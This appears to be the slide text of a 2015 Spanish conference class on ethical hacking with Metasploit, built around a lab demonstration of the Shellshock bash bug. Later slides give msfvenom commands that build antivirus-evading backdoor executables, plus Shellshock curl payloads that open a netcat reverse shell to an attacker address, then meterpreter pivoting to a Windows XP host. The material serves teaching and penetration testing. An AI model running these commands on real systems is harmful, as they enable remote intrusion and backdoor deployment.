SlideShare una empresa de Scribd logo
1 de 33
II JORNADA DE SEGURIDAD EN LAS
COMUNICACIONES Y LA INFORMACIÓN
1
09/Junio 2015
Julián José González Caracuel
Consultor Senior de Seguridad de la Información
CISA /GCIH /GPEN /ITIL Certified
Organiza:
¿Quién soy?
2
Julian J. González Caracuel
Ingeniero de Telecomunicaciones – Esp. Telemática
Consultor Senior Seguridad de la Información
CISA /GCIH /GPEN /ITIL Certified
En sus mas de 10 años de experiencia, ha sido miembro del NVAT (Equipo
Nacional de Análisis de Vulnerabilidades) en el Estado Mayor de la Defensa
(EMAD), asesor del equipo directivo de Centro de Excelencia CIED de la OTAN en
Hoyo de Manzanares, e investigador en el ámbito de los procedimientos y
metodologías en entorno a la protección de las Infraestructuras Críticas.
Profesor del Modulo de Hacking & Pentesting – Máster de Seguridad TIC –
Universidad de Sevilla.
Actualmente ejerciendo de Freelance bajo la marca ST2Labs.
La clase de hoy
3
INTRODUCCIÓN LESSON LEARNEDDEMOSTRACIÓN
4
INTRODUCCIÓN
¿Qué es Hacking?
5
• Es la actividad donde se pone en práctica tu habilidad para evadir
los sistema de protección y acceder a un Sistema.
• En éste área se realizan los test de penetración, comprobación del
nivel de seguridad de la Organización desde el punto de vista del
atacante, buscando vulnerabilidades y la forma de explotarlas.
Hacking, es la parte más creativa del artista
By Julian J. González
¿Qué es Hacker Ético?
6
Por supuesto, para convertirse en un
Hacker Ético o profesional de la Seguridad
de la Información, se deben de obtener
los conocimientos suficientes como para
ser capaz de comprender la técnicas,
manejar las herramientas e interpretar los
resultados de éstas.
Real Academia Española (RAE) decidió incluir la palabra “hacker” en
el diccionario con una al menos curiosa definición: “pirata
informático
¿Qué es Hacker Ético?2
7
• Tipos de Hackers:
Black: utilizan sus
conocimientos para llevar a
cabo “actividades ilegales”
Grey: son “ambiguos”,
utilizan sus conocimientos
tanto para llevar a cabo
“actividades ilegales” como
legales.
White: utilizan sus
conocimientos para detectar
las debilidades y aplicar la
contramedidas necesarias.
Son los “Profesionales de la
Seguridad”
8
¿Por donde empiezo?
Vulnerabilidad vs Exploit
9
Exploit es una pieza de
software, fragmento de datos o
secuencia de comandos y/o
acciones, diseñada para
aprovechar la vulnerabilidad y
conseguir ejecución de código
arbitrario.
Vulnerabilidad es el
“comportamiento” no
esperado en un elemento
software, que suelen ser
errores de programación y/o
diseño de la aplicación o
software.
Exploit
10
!! Lo encontré ahora soy el AMO ¡¡¡
METASPLOIT FRAMEWORK
11
• La herramienta más utilizada por los #Pentester y
#Ethical Hacking!!
• Es una herramienta para el desarrollo y evaluación de
vulnerabilidades. ¡¡ Miles de Exploits listos para atacar !!
Web: http://www.metasploit.com/
Download:
http://www.metasploit.com/download/
Versión:
Community (Free)| Express |Professional
Framework (source code)
Multiplataforma: Linux / Windows / Mac
http://www.tenable.com/products/nessus/nessus-download-
agreement
Incluida en BackTrack Linux | www.kali.org Free Pentesting Linux Distribution
MSF | Arsenal
12
Exploits Payload Aux 1
Interfaz de
usuario
Modulos Auxiliares:
Port Scanning
Import vulnerbaility scanning
Servers (socks, telnet, ftp…)
Launcher Exploit Payload
MSF | Ejemplo
13
Ejemplo:
Utilización de msfpayload para generar un ejecutable que
habilitará en el equipo donde se ejecute una shell (línea
de comandos) remota (conexión con la dirección IP
introducida en el campo LHOST)
Cambiar LHOST por RHOST
MSF | Meterpreter
14
• Metasploit Interpreter: es un payload (stages) especialmente
diseñado por metasploit para ejecutarse dentro de la memoria de
un proceso residente.
• Se le conoce como Meterpreter, siendo el payload más potente y
flexible del que dispone metasploit.
• Permite la carga de módulos y scripts adicionales, por lo que
aumenta considerablemente la capacidad de este payload.
• Actualmente dispone de una versión de meterpreter tanto para
Windows como para Linux.
>> Hacking Mobile >Ahora Meterpreter también en Android!!!!
MSF | How Works
15
MSF SHELLCODE
<-IP:443->
shell remota
IP:443
MSF Elemento
Vulnerable
PAYLOAD:
meterpreter/reverse_tcp
meterpreter
Indirecto (URL, PDF, EXE) - Directo
EXPLOIT
(PAYLOAD)
MSF | How Works2
16
MSF
EXPLOIT
(PAYLOAD)
Carga en memoria el código arbitrario,
el STAGER (bind_tcp / reverse_tcp)
Elemento
Vulnerable
send(STAGES)
Bind_tcpPAYLOAD = shell / meterpreter
send(STAGES)
PAYLOAD = shell / meterpreter
reverse_tcp
IP:Port
IP:Port
RHOST
RPORT
LHOST
LPORT
listener
listener
DIRECT /
BIND
REVERSE
/ BIND
MSF | Ejemplo
17
MSF | Pivoting
18
PIVOTE
TARGET
MSF
TARGET
TARGET
MSFVENOM | Ejemplo
19
root@ST2Labs > msfpayload windows/patchupmeterpreter/reverse_tcp
LHOST=192.168.2.105 R | msfencode -e php/base64 -c 2 -t raw | msfencode -e
x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/jmp_call_additive -c 2 -t raw |
msfencode -e x86/shikata_ga_nai -c 5 -b 'xff" -t raw | msfencode -e x86/alpha_mixed
-c 1 -t exe -o backdoor4.exe
root@ST2Labs > msfvenom -p windows/meterpreter/reverse_ord_tcp -e
x86/shikata_ga_nai -b 'x00x20x0ax0d' -i 20 -f exe LHOST=192.168.2.105 > p6.exe
Técnicas evasión Antivirus | Encoding
https://github.com/Veil-Framework/Veil
https://github.com/Veil-Framework/
20
PRESENTACIÓN DEL CASO
SHELLSHOCK ATTACK
Bash < Vulnerable!
21
MILLONES DE DISPOSITIVOS BASADOS EN *NIX EXPUESTOS
CVE – SHELLSHOCK - TIMELINE
22
CVE (Common Vulnerabilities and Exposures)
15DIAS
Exploitable!
23
http://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the-
shellshock-vulnerability-bash-bug
How its Works!
24
env X= ‘ () { :;}; echo Vulnerable ’ bash –c “echo comando legitimo”
SMTP
HTTP
DHCP
SIP
Etc…
Servicios vulnerables:
25
ESCENARIO
SHELLSHOCK ATTACK
Pivoting !
26
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
OBJETIVO
27
DEMOSTRACIÓN
28
! RESUMEN PASO A PASO!
SHELLSHOCK ATTACK
29
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
1. SCAN SERVICIOS
2. SCAN SHELLSHOCK
3. COMPROBAR REGLAS FIREWALL
nc –lv –p 22  < Lado Server >
Check Reglas del Firewall
curl -k -H 'User-Agent: () { :;}; /bin/bash -c “echo Bingo!>/dev/tcp/10.0.0.50/22"' http://172.16.0.5/cgi-bin/st2.cgi
Shell Inversa
curl -k -H 'User-Agent: () { :;}; /bin/bash -c "nc -e /bin/bash 10.0.0.50 22"' http://172.16.0.5/cgi-bin/st2.cgi
ATTACK
30
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
EXPLOIT multi/handler < PAYLAOD= python/meterpreter/reverse_tcp
msf>
msfvenom –p python/meterpreter/reverse_tcp LHOST=10.0.0.50 LPORT=22
Pivoting !
31
192.168.0.3
WINXP SP3
HTTP SERVER 172.16.0.5
LINUX
ATTACKER
10.0.0.50
KALI LINUX
msf> route add 192.168.0.0 255.255.255.0 <sesión-id>
msf> use exploit Windows/smb/ms08_netapi / paylaod= windows/meterpreter/bind_tcp
Materia para profundizar
32
66,00 ECTS
Teléfono
954487384
Web
http://trajano.us.es/seguridadtic
Email
expertoseguridadtic@trajano.us.es
MASTER PROPIO –
SEGURIDAD EN LA INFORMACIÓN Y LAS
COMUNICACIONES (III EDICIÓN) – 2015/2016
@st2labs
@rhodius
33
www.seguridadparatodos.es
Julian J Gonzalez
¿Dónde podéis encontrarme?
www.st2labs.com
about.me/rhodius
https://github.com/ST2Labshttps://twitter.com/seguridadxato2

Más contenido relacionado

La actualidad más candente

Principios de Seguridad
Principios de SeguridadPrincipios de Seguridad
Principios de SeguridadPUIK900
 
Hackers en los sistemas de las administraciones públicas
Hackers en los sistemas de las administraciones públicasHackers en los sistemas de las administraciones públicas
Hackers en los sistemas de las administraciones públicasSEINHE
 
Alex Andone y Laura Blázquez 4ºB
Alex Andone y Laura Blázquez 4ºBAlex Andone y Laura Blázquez 4ºB
Alex Andone y Laura Blázquez 4ºBAleLau0
 
Caracteristicas de los antivirus
Caracteristicas de los antivirusCaracteristicas de los antivirus
Caracteristicas de los antivirusaleja6hh
 
Guía de supervivencia contra ataques web
Guía de supervivencia contra ataques webGuía de supervivencia contra ataques web
Guía de supervivencia contra ataques webTEUNO
 
Antivirus informaticos Pamela Oliva
Antivirus informaticos Pamela OlivaAntivirus informaticos Pamela Oliva
Antivirus informaticos Pamela OlivaPamela Oliva
 
Presentación antivirusinformaticos
Presentación antivirusinformaticosPresentación antivirusinformaticos
Presentación antivirusinformaticosPamela Oliva
 
Presentación antivirusinformaticos
Presentación antivirusinformaticosPresentación antivirusinformaticos
Presentación antivirusinformaticosPamelaOliva98
 
COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
COMO PROTEGERSE DE LOS VIRUS INFORMATICOSCOMO PROTEGERSE DE LOS VIRUS INFORMATICOS
COMO PROTEGERSE DE LOS VIRUS INFORMATICOSErikita Maldonado
 
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOSYaritza Cedillo
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)YuniorGregorio2
 
Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Héctor López
 
Cómo proteger mi organización del ataque de un ransomeware por Fortinet
Cómo proteger mi organización del ataque de un ransomeware por FortinetCómo proteger mi organización del ataque de un ransomeware por Fortinet
Cómo proteger mi organización del ataque de un ransomeware por FortinetSupra Networks
 

La actualidad más candente (17)

Principios de Seguridad
Principios de SeguridadPrincipios de Seguridad
Principios de Seguridad
 
Hackers en los sistemas de las administraciones públicas
Hackers en los sistemas de las administraciones públicasHackers en los sistemas de las administraciones públicas
Hackers en los sistemas de las administraciones públicas
 
Vulnerabilidades de un sistema informático
Vulnerabilidades de un sistema informáticoVulnerabilidades de un sistema informático
Vulnerabilidades de un sistema informático
 
Alex Andone y Laura Blázquez 4ºB
Alex Andone y Laura Blázquez 4ºBAlex Andone y Laura Blázquez 4ºB
Alex Andone y Laura Blázquez 4ºB
 
Caracteristicas de los antivirus
Caracteristicas de los antivirusCaracteristicas de los antivirus
Caracteristicas de los antivirus
 
McAfee
McAfeeMcAfee
McAfee
 
Guía de supervivencia contra ataques web
Guía de supervivencia contra ataques webGuía de supervivencia contra ataques web
Guía de supervivencia contra ataques web
 
Alejandro Rubial Pérez
Alejandro Rubial PérezAlejandro Rubial Pérez
Alejandro Rubial Pérez
 
Antivirus informaticos Pamela Oliva
Antivirus informaticos Pamela OlivaAntivirus informaticos Pamela Oliva
Antivirus informaticos Pamela Oliva
 
Presentación antivirusinformaticos
Presentación antivirusinformaticosPresentación antivirusinformaticos
Presentación antivirusinformaticos
 
Presentación antivirusinformaticos
Presentación antivirusinformaticosPresentación antivirusinformaticos
Presentación antivirusinformaticos
 
COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
COMO PROTEGERSE DE LOS VIRUS INFORMATICOSCOMO PROTEGERSE DE LOS VIRUS INFORMATICOS
COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
 
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
11.Milena Palacios COMO PROTEGERSE DE LOS VIRUS INFORMATICOS
 
Clase 18
Clase 18Clase 18
Clase 18
 
Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)Tema 9 comando kali linux (1)
Tema 9 comando kali linux (1)
 
Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5Conferencia OMHE Backtrack 5
Conferencia OMHE Backtrack 5
 
Cómo proteger mi organización del ataque de un ransomeware por Fortinet
Cómo proteger mi organización del ataque de un ransomeware por FortinetCómo proteger mi organización del ataque de un ransomeware por Fortinet
Cómo proteger mi organización del ataque de un ransomeware por Fortinet
 

Destacado

Vulnerabilities are bugs, Let's Test For Them!
Vulnerabilities are bugs, Let's Test For Them!Vulnerabilities are bugs, Let's Test For Them!
Vulnerabilities are bugs, Let's Test For Them!VAddy
 
Power Point, Funciones De Scribd
Power Point, Funciones De ScribdPower Point, Funciones De Scribd
Power Point, Funciones De Scribdlaregota
 
PuppetDB, Puppet Explorer and puppetdbquery
PuppetDB, Puppet Explorer and puppetdbqueryPuppetDB, Puppet Explorer and puppetdbquery
PuppetDB, Puppet Explorer and puppetdbqueryPuppet
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThomas Graf
 
Docker and Puppet for Continuous Integration
Docker and Puppet for Continuous IntegrationDocker and Puppet for Continuous Integration
Docker and Puppet for Continuous IntegrationGiacomo Vacca
 
Automating OpenSCAP with Foreman
Automating OpenSCAP with ForemanAutomating OpenSCAP with Foreman
Automating OpenSCAP with Foremanszadok
 
Windows Configuration Management: Managing Packages, Services, & Power Shell-...
Windows Configuration Management: Managing Packages, Services, & Power Shell-...Windows Configuration Management: Managing Packages, Services, & Power Shell-...
Windows Configuration Management: Managing Packages, Services, & Power Shell-...Puppet
 
AWS July Webinar Series: Introducing AWS OpsWorks for Windows Server
AWS July Webinar Series: Introducing AWS OpsWorks for Windows ServerAWS July Webinar Series: Introducing AWS OpsWorks for Windows Server
AWS July Webinar Series: Introducing AWS OpsWorks for Windows ServerAmazon Web Services
 
Introducing AWS Elastic Beanstalk
Introducing AWS Elastic BeanstalkIntroducing AWS Elastic Beanstalk
Introducing AWS Elastic BeanstalkAmazon Web Services
 
Installaling Puppet Master and Agent
Installaling Puppet Master and AgentInstallaling Puppet Master and Agent
Installaling Puppet Master and AgentRanjit Avasarala
 
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibana
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and KibanaPuppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibana
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibanapkill
 
Provisioning environments. A simplistic approach
Provisioning  environments. A simplistic approachProvisioning  environments. A simplistic approach
Provisioning environments. A simplistic approachEder Roger Souza
 
Microsoft Windows 10 Bootcamp - Active directory
Microsoft Windows 10 Bootcamp - Active directoryMicrosoft Windows 10 Bootcamp - Active directory
Microsoft Windows 10 Bootcamp - Active directoryOlav Tvedt
 
Power shell for newbies getting started powershell 4
Power shell for newbies getting started powershell 4Power shell for newbies getting started powershell 4
Power shell for newbies getting started powershell 4Zafar Ali Khan
 
Handling of compromised Linux systems
Handling of compromised Linux systemsHandling of compromised Linux systems
Handling of compromised Linux systemsMichael Boelen
 
Package Management on Windows with Chocolatey
Package Management on Windows with ChocolateyPackage Management on Windows with Chocolatey
Package Management on Windows with ChocolateyPuppet
 

Destacado (20)

Ataque por dns spooging y troyano
Ataque por dns spooging y troyanoAtaque por dns spooging y troyano
Ataque por dns spooging y troyano
 
Vulnerabilities are bugs, Let's Test For Them!
Vulnerabilities are bugs, Let's Test For Them!Vulnerabilities are bugs, Let's Test For Them!
Vulnerabilities are bugs, Let's Test For Them!
 
Ataque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffingAtaque por inyección de código sql y sniffing
Ataque por inyección de código sql y sniffing
 
Curso de Metasploit
Curso de MetasploitCurso de Metasploit
Curso de Metasploit
 
Power Point, Funciones De Scribd
Power Point, Funciones De ScribdPower Point, Funciones De Scribd
Power Point, Funciones De Scribd
 
PuppetDB, Puppet Explorer and puppetdbquery
PuppetDB, Puppet Explorer and puppetdbqueryPuppetDB, Puppet Explorer and puppetdbquery
PuppetDB, Puppet Explorer and puppetdbquery
 
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RCThe Next Generation Firewall for Red Hat Enterprise Linux 7 RC
The Next Generation Firewall for Red Hat Enterprise Linux 7 RC
 
How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF How to Setup A Pen test Lab and How to Play CTF
How to Setup A Pen test Lab and How to Play CTF
 
Docker and Puppet for Continuous Integration
Docker and Puppet for Continuous IntegrationDocker and Puppet for Continuous Integration
Docker and Puppet for Continuous Integration
 
Automating OpenSCAP with Foreman
Automating OpenSCAP with ForemanAutomating OpenSCAP with Foreman
Automating OpenSCAP with Foreman
 
Windows Configuration Management: Managing Packages, Services, & Power Shell-...
Windows Configuration Management: Managing Packages, Services, & Power Shell-...Windows Configuration Management: Managing Packages, Services, & Power Shell-...
Windows Configuration Management: Managing Packages, Services, & Power Shell-...
 
AWS July Webinar Series: Introducing AWS OpsWorks for Windows Server
AWS July Webinar Series: Introducing AWS OpsWorks for Windows ServerAWS July Webinar Series: Introducing AWS OpsWorks for Windows Server
AWS July Webinar Series: Introducing AWS OpsWorks for Windows Server
 
Introducing AWS Elastic Beanstalk
Introducing AWS Elastic BeanstalkIntroducing AWS Elastic Beanstalk
Introducing AWS Elastic Beanstalk
 
Installaling Puppet Master and Agent
Installaling Puppet Master and AgentInstallaling Puppet Master and Agent
Installaling Puppet Master and Agent
 
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibana
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and KibanaPuppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibana
Puppetconf 2015 - Puppet Reporting with Elasticsearch Logstash and Kibana
 
Provisioning environments. A simplistic approach
Provisioning  environments. A simplistic approachProvisioning  environments. A simplistic approach
Provisioning environments. A simplistic approach
 
Microsoft Windows 10 Bootcamp - Active directory
Microsoft Windows 10 Bootcamp - Active directoryMicrosoft Windows 10 Bootcamp - Active directory
Microsoft Windows 10 Bootcamp - Active directory
 
Power shell for newbies getting started powershell 4
Power shell for newbies getting started powershell 4Power shell for newbies getting started powershell 4
Power shell for newbies getting started powershell 4
 
Handling of compromised Linux systems
Handling of compromised Linux systemsHandling of compromised Linux systems
Handling of compromised Linux systems
 
Package Management on Windows with Chocolatey
Package Management on Windows with ChocolateyPackage Management on Windows with Chocolatey
Package Management on Windows with Chocolatey
 

Similar a Metasploit Class: Shellshock Attack

Advanced Persistent Threat ' BugCON 2023
Advanced Persistent Threat '  BugCON 2023Advanced Persistent Threat '  BugCON 2023
Advanced Persistent Threat ' BugCON 2023Jonathan Palacios
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingAlonso Caballero
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" CIDITIC - UTP
 
Ethical kacking a plataformas Elastix
Ethical kacking a plataformas ElastixEthical kacking a plataformas Elastix
Ethical kacking a plataformas ElastixOpenDireito
 
voip2day 2012 - Ethical hacking a plataformas elastix by juan oliva
voip2day 2012 - Ethical hacking a plataformas elastix by juan olivavoip2day 2012 - Ethical hacking a plataformas elastix by juan oliva
voip2day 2012 - Ethical hacking a plataformas elastix by juan olivaVOIP2DAY
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...Héctor López
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkAlonso Caballero
 
Seguridad y Penetration Testing
Seguridad y Penetration TestingSeguridad y Penetration Testing
Seguridad y Penetration TestingAlonso Caballero
 
Security de Hacking-etico-.pdf
Security de Hacking-etico-.pdfSecurity de Hacking-etico-.pdf
Security de Hacking-etico-.pdfLuisMuoz394308
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...RootedCON
 
Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"CIDITIC - UTP
 
Reviving Homograph Attacks using (deep learning) steroids
Reviving Homograph Attacks using (deep learning) steroidsReviving Homograph Attacks using (deep learning) steroids
Reviving Homograph Attacks using (deep learning) steroidsAlfonso Muñoz, PhD
 
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensiva
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensivaMachine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensiva
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensivaOwaspMadrid Chapter
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usnavajanegra
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to usz0mbiehunt3r
 

Similar a Metasploit Class: Shellshock Attack (20)

Advanced Persistent Threat ' BugCON 2023
Advanced Persistent Threat '  BugCON 2023Advanced Persistent Threat '  BugCON 2023
Advanced Persistent Threat ' BugCON 2023
 
Penetration Testing / Ethical Hacking
Penetration Testing / Ethical HackingPenetration Testing / Ethical Hacking
Penetration Testing / Ethical Hacking
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
PPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptxPPT_Carlos Nieto_v03_06_2021.pptx
PPT_Carlos Nieto_v03_06_2021.pptx
 
Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester" Certificación "Thd epc ethical pentester"
Certificación "Thd epc ethical pentester"
 
Ethical kacking a plataformas Elastix
Ethical kacking a plataformas ElastixEthical kacking a plataformas Elastix
Ethical kacking a plataformas Elastix
 
voip2day 2012 - Ethical hacking a plataformas elastix by juan oliva
voip2day 2012 - Ethical hacking a plataformas elastix by juan olivavoip2day 2012 - Ethical hacking a plataformas elastix by juan oliva
voip2day 2012 - Ethical hacking a plataformas elastix by juan oliva
 
hackinbo.pdf
hackinbo.pdfhackinbo.pdf
hackinbo.pdf
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit FrameworkWebinar Gratuito: Crear un Medio Infectado con Metasploit Framework
Webinar Gratuito: Crear un Medio Infectado con Metasploit Framework
 
Seguridad y Penetration Testing
Seguridad y Penetration TestingSeguridad y Penetration Testing
Seguridad y Penetration Testing
 
Security de Hacking-etico-.pdf
Security de Hacking-etico-.pdfSecurity de Hacking-etico-.pdf
Security de Hacking-etico-.pdf
 
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
Alfonso Muñoz - Reviving Homograph attacks using (deep learning) steroids [ro...
 
Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"Certificación "THD-EPC Ethical Pentester Panamá"
Certificación "THD-EPC Ethical Pentester Panamá"
 
Reviving Homograph Attacks using (deep learning) steroids
Reviving Homograph Attacks using (deep learning) steroidsReviving Homograph Attacks using (deep learning) steroids
Reviving Homograph Attacks using (deep learning) steroids
 
Threat intelligence
Threat intelligenceThreat intelligence
Threat intelligence
 
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensiva
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensivaMachine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensiva
Machine Learning aplicado a ciberseguridad. Limitaciones y seguridad ofensiva
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
All your appliances are belong to us
All your appliances are belong to usAll your appliances are belong to us
All your appliances are belong to us
 
Seguridad en dispositivos móviles
Seguridad en dispositivos móvilesSeguridad en dispositivos móviles
Seguridad en dispositivos móviles
 

Último

Presupuesto por Resultados de Seguridad Ciudadana .pptx
Presupuesto por Resultados de Seguridad Ciudadana .pptxPresupuesto por Resultados de Seguridad Ciudadana .pptx
Presupuesto por Resultados de Seguridad Ciudadana .pptxhugogabrielac1
 
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...
PRESENTACION EN SST, plan de trabajo del sistema de seguridad y salud en el t...angierangel29072017
 
Pablo Scasso - eCommerce Day Chile 2024
Pablo Scasso -  eCommerce Day Chile 2024Pablo Scasso -  eCommerce Day Chile 2024
Pablo Scasso - eCommerce Day Chile 2024eCommerce Institute
 
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024
Mercedes Tomas, Florencia Bianchini - eCommerce Day Chile 2024eCommerce Institute
 
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024
José Ignacio Calle, Nathalie Jacobs - eCommerce Day Chile 2024eCommerce Institute
 
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...
Nicolás von Graevenitz, Rodrigo Guajardo, Fabián Müller, Alberto Banano Pardo...eCommerce Institute
 
Suiwen He - eCommerce Day Chile 2024
Suiwen He  -  eCommerce  Day  Chile 2024Suiwen He  -  eCommerce  Day  Chile 2024
Suiwen He - eCommerce Day Chile 2024eCommerce Institute
 
Felipe González - eCommerce Day Chile 2024
Felipe González - eCommerce Day Chile 2024Felipe González - eCommerce Day Chile 2024
Felipe González - eCommerce Day Chile 2024eCommerce Institute
 
Sebastián Iturriaga - eCommerce Day Chile 2024
Sebastián Iturriaga - eCommerce Day Chile 2024Sebastián Iturriaga - eCommerce Day Chile 2024
Sebastián Iturriaga - eCommerce Day Chile 2024eCommerce Institute
 
Enrique Amarista Graterol - eCommerce Day Chile 2024
Enrique Amarista Graterol - eCommerce Day Chile 2024Enrique Amarista Graterol - eCommerce Day Chile 2024
Enrique Amarista Graterol - eCommerce Day Chile 2024eCommerce Institute
 
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024
Alexander Rubilar, Enzo Tapia - eCommerce Day Chile 2024eCommerce Institute
 
Expo Construir 2024 agenda-workshops (2).pdf
Expo Construir 2024 agenda-workshops (2).pdfExpo Construir 2024 agenda-workshops (2).pdf
Expo Construir 2024 agenda-workshops (2).pdfTamanaTablada
 
Modelos comunicacionales. Antonella Castrataro.pdf
Modelos comunicacionales. Antonella Castrataro.pdfModelos comunicacionales. Antonella Castrataro.pdf
Modelos comunicacionales. Antonella Castrataro.pdfnenelli2004
 
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdf
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdfAct#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdf
Act#3.2_Investigación_Bibliográfica_Comunicación_Equipo.pdfXimenaGonzlez95
 
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024
Francisco Irarrazaval, Marcos Pueyrredon - eCommerce Day Chile 2024eCommerce Institute
 

Último (15)

Presupuesto por Resultados de Seguridad Ciudadana .pptx
Presupuesto por Resultados de Seguridad Ciudadana .pptxPresupuesto por Resultados de Seguridad Ciudadana .pptx
